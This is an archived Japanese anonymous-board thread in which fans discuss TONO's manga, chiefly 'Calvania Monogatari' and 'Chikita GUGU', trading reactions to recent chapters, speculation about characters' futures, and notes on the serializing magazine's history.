150 :花と名無しさん:2006/12/20(水) 11:06:40 ID:???0
話ぶち切ってゴメン

カルバニアの10巻の表紙、フィーちゃんのうんこついて
捨てられちゃったんだって・・・。

151 :花と名無しさん:2006/12/20(水) 13:26:11 ID:???0
とっといて欲しかった。デジタル処理して保存とかはしてないのか?

うんこは絵を変色させるかもしれないし仕方ないのかもなぁ。

152 :花と名無しさん:2006/12/20(水) 13:28:24 ID:???0
>デジタル処理して保存
自称・原始人のTONOさんにそんな高度な技は…orz

153 :花と名無しさん:2006/12/20(水) 15:07:50 ID:???0
原画を捨てたの?
こないだの漫画では単行本のカバーにうんにょがついて
カバーだけを外して捨てたように読めたんだが
あれとは別件で、原画にうんこが付着?

154 :花と名無しさん:2006/12/20(水) 15:19:18 ID:???0
>153
私もそう思って読んでた。
TONOさん宅のカルバニアのコミックス10巻にフィーちゃんのンコがついちゃったからカバーを剥がして捨てたんじゃなく原稿?
でもカルバニアはまだ連載中だし原稿(カラーも)は編集部で保管してるんじゃなかろうか?

155 :花と名無しさん:2006/12/20(水) 19:45:07 ID:???0
まろは今月TONOさん帰省時ついに返還される
妹はフィーを返してほしいらしいけど…

156 :花と名無しさん:2006/12/20(水) 21:02:50 ID:???0
>155
>妹はフィーを返してほしいらしいけど…
ちょっ、それどこ情報?
本気でそんなこと言ってんなら殴ってやりたい・・・。

157 :花と名無しさん:2006/12/20(水) 21:44:35 ID:???0
また妹叩きしたいやつがいるなあ

158 :花と名無しさん:2006/12/21(木) 00:45:41 ID:???0
スルーしとけ

159 :花と名無しさん:2006/12/22(金) 14:03:55 ID:???0
妹叩くならこちらへ↓
ttp://jbbs.livedoor.jp/bbs/read.cgi/otaku/5179/1125395797/l50

160 :花と名無しさん :2006/12/22(金) 21:49:55 ID:???0
エキュー、公爵就任おめでとう。

161 :花と名無しさん:2006/12/22(金) 21:58:30 ID:???0
>>160 目欄に書いてもらった方が良かったかも?

まだ、読んでないけど、ライアンには辛い日々が続くのかな・・・?

162 :花と名無しさん:2006/12/23(土) 00:55:00 ID:???0
引越しの荷物整理で、
『カルバニア物語 女王陛下ドレスブック』なる本が出てきた

TONOさんって、他にもカルバニア物語の同人誌出してるのかな?
他のも読んでみたい・・・

163 :花と名無しさん:2006/12/23(土) 14:20:44 ID:QX/+hvwI0
カルバニアage

エキューのベスト体重って何kgなのかな。
鍛えてるから50kgはあるよなー。

164 :花と名無しさん:2006/12/23(土) 19:09:40 ID:???0
まるで、エキューとタニアの結婚式のようだった。
そして、ライアンが花嫁の父w
ね……狙ってやってるのか、TONOさんw

ノマ嗜好のライアン×エキュー押しなんだが、
エキューとタニアに胸キュンしてしまったさ。
うわーい、ジジイどもと同じだー。

165 :花と名無しさん:2006/12/24(日) 14:52:58 ID:???0
>>163
背も高そうだしね。
そのうちライアン超えるってほんとか!

166 :花と名無しさん:2006/12/24(日) 17:06:42 ID:???0
貰い泣きしますた。読み始めた頃は物語の中でエキューが公爵になるとは
思わんかったよ。エキューオメ!タニアもオメ!でも公爵になることより、公爵として何をなす
かが重要ですぞ!言葉どおりガンガレエキュー!

167 :花と名無しさん :2006/12/25(月) 10:28:06 ID:???0
タニアも大掛かりな記念式典のときに生理になっちゃってたよね。
やはり乳兄弟だのぉw
もし足元に血溜り〜なんてことになっていても、やっぱりあのカラントレッドは洗って再利用したのだろうか。

168 :花と名無しさん:2006/12/25(月) 12:06:46 ID:???0
>>162の『カルバニア物語 女王陛下ドレスブック』って
まだイベントで売ってる?

今度の冬コミで買いたいなぁ〜

169 :花と名無しさん:2006/12/25(月) 15:48:58 ID:???0
ドレスブックさすがにもうイベントでは売ってないんじゃない?
自分が買ったのってかな〜り前だよ。
つか先月引越しの折某古書店にお譲りしたので、
ま●だ●けで今ごろ売っているんじゃないかと思われ

170 :花と名無しさん:2006/12/25(月) 19:28:05 ID:???0
今月号読んだ。

カルバニアってこんなに泣かせる話しだったっけ?
ここんとこ泣かされっぱなしだけど、本当に良いな。

171 :花と名無しさん:2006/12/26(火) 12:55:15 ID:???0
チキタ終わったらカルバニアをネムキに移動してくんないかな…。

172 :花と名無しさん:2006/12/26(火) 13:46:55 ID:gqrHjvN70
>171
出版社違うから、さすがに無理だとオモ。
移動するならリュウかな。編集長は元キャラの編集長だし。
リュウなら、TONOさんの好きな乳とおっさん好きなだけ出せそうだし、
美少年と美青年出す必要なさそう。
行ってくれればキャラ買う必要なくなるしリュウ買うモチベーション上
がるなあ。月刊はTONOさんにはきつそうだけど。

173 :花と名無しさん:2006/12/26(火) 13:49:06 ID:???0
リュウは雑誌自体がどれくらい持つか……

174 :花と名無しさん:2006/12/26(火) 17:05:06 ID:???0
途中で版型が変わるの嫌だから今のままでいいよ…
キャラ→リュウ→他
こんなにコロコロ変わるのは嫌だ

175 :花と名無しさん:2006/12/26(火) 17:35:39 ID:???0
?ここまで巻数でてたらたとえば掲載誌が変わっても、普通同じ版型で出すと思うよ?
同じ出版社での話なわけだし。
まあ、ないと思うけどね。
しかしなんでこれ連載がキャラなんだろうな・・・
単行本買い始めたときから不思議でたまらん。
これだけのために買うにはキャラには読むものがないし・・・

176 :花と名無しさん:2006/12/26(火) 17:47:43 ID:???0
>>175
ちょっとヲタ気味な少女向けファンタジー&SF漫画雑誌として創刊(当時の看板は銀英伝。フォモくさいのはのせくん程度)

いろいろ時流を読んでヲタ女子に受けのいいフォモ要素を追加

追加追加追加

浮きまくりのカルバニア  ←いまここ

177 :175:2006/12/26(火) 19:57:27 ID:???0
そうだったのか!
いや、昔のことは知らなかったから、普通にフォモ雑誌なんだとばっかり・・・


178 :花と名無しさん:2006/12/27(水) 00:48:05 ID:???0
創刊当時はNoelだっけ
家庭教師に妙な方言で教え込まれる姫様話だったが、あの時は全然違和感なんてなかった…
やった!とのこさんにピッタリな雑誌じゃんと毎号買ってますた。

179 :花と名無しさん:2006/12/27(水) 23:13:02 ID:???0
キャラって最初は銀英とかのってたよね?

180 :花と名無しさん:2006/12/27(水) 23:21:11 ID:???0
銀英載ってたね。

次はエキューの大人っぽいドレス姿見られるのかなー。
今回は思いがけず可愛らしい姿を見られてラッキーだった。

181 :花と名無しさん:2006/12/28(木) 20:15:32 ID:???0
>>169様 ありがとうございます
おかげでドレスブックが手に入りました 感謝

182 :花と名無しさん:2006/12/28(木) 21:35:29 ID:???0
今月タニアとエキューにつられて立ち読みでぶわっときた。
エキュー腹回りに肉ついても胸には肉つかないんだろーなw

183 :花と名無しさん:2007/01/02(火) 00:05:07 ID:???O
皆さんおめー。
今年も沢山TONOさんの描く話が見られるといいね。
…って早々に一つ終わりそうだけど(チキタ)
でもネムキってとてもTONOさんに合った雑誌だと思うから
次の連載もここで始めて欲しいな。
…とちんたら書いている内におみくじ終わっちゃった。今年のTONOさんの運勢出したかったのに。

184 :花と名無しさん:2007/01/03(水) 21:31:45 ID:???O
今回のカルバニア、良かった〜。
187も書いてるけど立ち読みで涙でた。
この話だけのために雑誌買っちゃった。

185 :花と名無しさん:2007/01/04(木) 10:22:57 ID:???0
187は立ち読み頑張れ。

186 :花と名無しさん:2007/01/04(木) 14:21:39 ID:???0
>>187
立ち読みした?

187 :花と名無しさん:2007/01/04(木) 14:22:37 ID:???0
これから行ってくる。

188 :花と名無しさん:2007/01/04(木) 14:28:50 ID:???0
>>187
お前には失望した!!

189 :花と名無しさん:2007/01/04(木) 16:30:35 ID:???0
空気イス読みはダメですか?

190 :花と名無しさん:2007/01/05(金) 00:07:46 ID:???0
カルバニアになぜか存在するラー像の謎が解けそうな件…
アンタそりゃ東の国の人食い熊ですよ、と教えてやりたい

191 :花と名無しさん:2007/01/05(金) 10:40:46 ID:???0
あ、あの世界って繋がってるんだ?

192 :花と名無しさん:2007/01/05(金) 12:09:41 ID:???0
>>191
「繋がってる」というよりは「分別してない」というニュアンスじゃないかと。

193 :花と名無しさん:2007/01/06(土) 13:29:10 ID:???0
ものすごくどーでもいいことなんだけど、
シャンシャン家のとーちゃんは、手当たり次第な
女好きとは言え、いくらなんでも「息子の嫁」には
手ぇ出したりしないだろう……なあ。

バランスはあの一家の中じゃ、わりと良識派っぽいけど
(ニッケルの件の時に、もうちょっと年がいってたとしても、
ニッケルを襲う仲間には加わらなかったろうな)、他の
家族もいろいろ歪んでそうだしなあ…。

194 :花と名無しさん:2007/01/06(土) 14:20:32 ID:???0
あんな危ない職業だから壊滅を防ぐために大量に子供を作ってるんじゃまいの
と擁護してみるw

他のアヤシヤはそんなことしてないみたいだけど。

195 :花と名無しさん:2007/01/06(土) 15:54:02 ID:???0
パーマー国王もこのくらいやればいいのに、という話
ttp://www.yomiuri.co.jp/world/news/20070106it04.htm?from=top

196 :花と名無しさん:2007/01/06(土) 15:57:15 ID:???0
たくさん子供を作って競わせて生き残った子=運も含めて一番強い子 を跡継ぎにして一族の繁栄を図ってるつもりかも
なんかちょっとコドク(虫の字3つと毒)みたいだけどw

197 :花と名無しさん:2007/01/06(土) 17:35:20 ID:???0
チキタ・GUGU再読。

3巻P.97の”嫁業おフダかき”ってのは”稼業”の書き間違いだろうけど、
ニッケルが”花嫁修業”してるみたいで可愛いな。

2巻P.43の”二百年前”ってのは”三百年前”の書き間違いかな。
その後の台詞では三百年前になってるから、
あの時点でクリップがすでに100才だった、なんてことはないだろうな。

1巻の頃は妖の読みは「あやかし」なのに、2巻以降は「あやし」なんだな。
個人的には「あやかし」の方が好きだけどな。

5巻P.150、151の白い食べ物列挙、大根がないのはなぜだろう?

4巻P.43右上のコマ、デビルマン思い出すな。そんで下のコマはゴヤの
子供を食らうサトゥルヌス思い出した。

オルグが飢えて動かなかった頃、クリップは何を食べてたんだろう?
オルグが心臓の周りの光を食べて、クリップが残りの肉を食べれば
ムダがないのに。

ぺトラスの研究会、不老不死を研究するなら他の誰より先に
不老のチキタを捕まえて研究材料にすべきだろう、と思った。

198 :花と名無しさん:2007/01/06(土) 22:48:15 ID:???0
あやし派です。

199 :花と名無しさん:2007/01/08(月) 13:14:09 ID:???0
ラーが無力な状態ってことは、これからチキタは成長する?
このままじゃ、グーグー家断絶だし。
指輪のフロドじゃなくサムみたいに、
人間としてやることやってから、100年目だったらいいな。

200 :花と名無しさん:2007/01/08(月) 15:14:36 ID:???0
動かないオルグと一緒でもクリップが成長しなかったからどうなんだろう。

チキタとくっつきたい漢なオナゴは一人は死に
一人は嫁に行ってしまったわけだが・・・
ラーはあの妖怪状態から女子へと成長してくれるんだろうか・・・

201 :花と名無しさん:2007/01/08(月) 16:36:35 ID:???0
普通の人間並みに年を重ねたハイカがチキタを訪れて
ラーをちゃんとした人間の赤ん坊として生み直してはくれないだろうか


202 :花と名無しさん:2007/01/08(月) 16:54:07 ID:???0
>>201
昔からよくあるネタだけど、そういう「産み直し」ってものすごくいやだ。


203 :花と名無しさん:2007/01/08(月) 17:39:11 ID:???0
>201
今の時点でハイカっていくつくらいなんだろう?
ハイカならニッケルのことも大好きだったからそれでもいい。
とにかく今のラーを見てるのが辛い「誰か助けてあげて」と言いたくなる。
TONOさんの作品って時々なんでこんなに胸が締め付けられるんだろうね。

204 :花と名無しさん:2007/01/08(月) 18:22:41 ID:???0
チキタの相手というと・・・
バランスやサデュースの姉・妹とかが候補か。
成長・老化が遅いなら、ハイカの娘もあり。

>>200
オルグは動かなくても力が完全に消えてたわけじゃないし、
自分のことよりクリップ優先だったから、クリップは不老だったのかも。
チキタ、ラー効果が消えてもオルグ効果で不老が続いたりして。

205 :花と名無しさん:2007/01/08(月) 18:39:04 ID:???O
ドSの自分ですが、チキタについては、
ハッピィーエンド切望。

206 :花と名無しさん:2007/01/08(月) 18:44:27 ID:???0
アヤカシ作りの銘菓グーグー家はチキタで終わってしまうんかなぁ
しかし成長しはじめたらチキタの美貌のピンチでもないかw

207 :花と名無しさん:2007/01/08(月) 18:55:33 ID:???0
クリップとオルグの例から考えると、
彼らのハッピーエンドって、100年目達成記念心中?
だらだら生き続けるのも、片方が残されるのも辛そうだし。

手に手をとって、ニッケルの言ってた「素晴らしいところ」へ一緒に旅立つ
んならそれもいいかも。

208 :花と名無しさん:2007/01/08(月) 18:56:51 ID:???0
ちゃんと年取って寿命で死のうってことだと思うんだが

209 :花と名無しさん:2007/01/08(月) 19:33:53 ID:???0
ニッケルの待つ「素晴らしいところ」へ行くためにはただ死んでもダメで
ちゃんと生きて目標を見つけて達成しなきゃ行けないんだと思う。
ニッケルの場合チキタ達を守りたいと思って達成出来たから行けたってことで…

210 :花と名無しさん:2007/01/09(火) 00:02:24 ID:???0
>>201
ハイカと旦那の間にラーが生まれるってこと?
それともハイカが旦那と別れるかなんかしてチキタとの間にラーを生むってこと?

どっちもなさそうだな…

211 :花と名無しさん:2007/01/09(火) 00:42:53 ID:???0
大昔の萩尾望都の「スターレッド」で男の子が性転換してアクシデントで精神体になってしまったヒロインを孕んで「全く新しい個人」として生み直す…て展開があったの思い出した。

212 :花と名無しさん:2007/01/09(火) 02:06:38 ID:???0
http://www.37vote.net/anime/1168084494/

213 :花と名無しさん:2007/01/09(火) 13:15:27 ID:???0
しましまがなかなか見つからない…

214 :花と名無しさん:2007/01/10(水) 00:47:31 ID:???0
つ┃┃┃┃┃

215 :花と名無しさん:2007/01/10(水) 08:54:03 ID:???0
ありがとう、すごくつまらないよ

216 :花と名無しさん:2007/01/10(水) 12:08:35 ID:???0
もっと優しくもふもふして

217 :213:2007/01/10(水) 13:09:07 ID:???0
>>214
まあ、なんだ、えーと一応ありがたくもらっておきますね…

218 :花と名無しさん:2007/01/10(水) 21:27:30 ID:???O
ニッケルが生まれ変わるなんて・・・ないよなぁ(´・ω・`)

219 :花と名無しさん:2007/01/10(水) 22:06:23 ID:???0
砂の下の夢の2巻が、2月に発売予定らしいよ。
ソースは、まんがの森の2月新刊のリスト。


220 :花と名無しさん:2007/01/10(水) 22:12:05 ID:???0
>>219
>>143

221 :花と名無しさん:2007/01/12(金) 23:30:37 ID:???0
今にも死にそうなのに何をしても死ななかったラーがそんなに簡単に死ぬのかと。
次回が楽しみだなぁ、ラーの成長が。

222 :花と名無しさん:2007/01/20(土) 01:49:21 ID:???0
何をしても死ななかった理由(グーグーの術)が消えたんだから
ぽっくり逝ってもおかしくないと思うけど。
成長できるんかな…

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)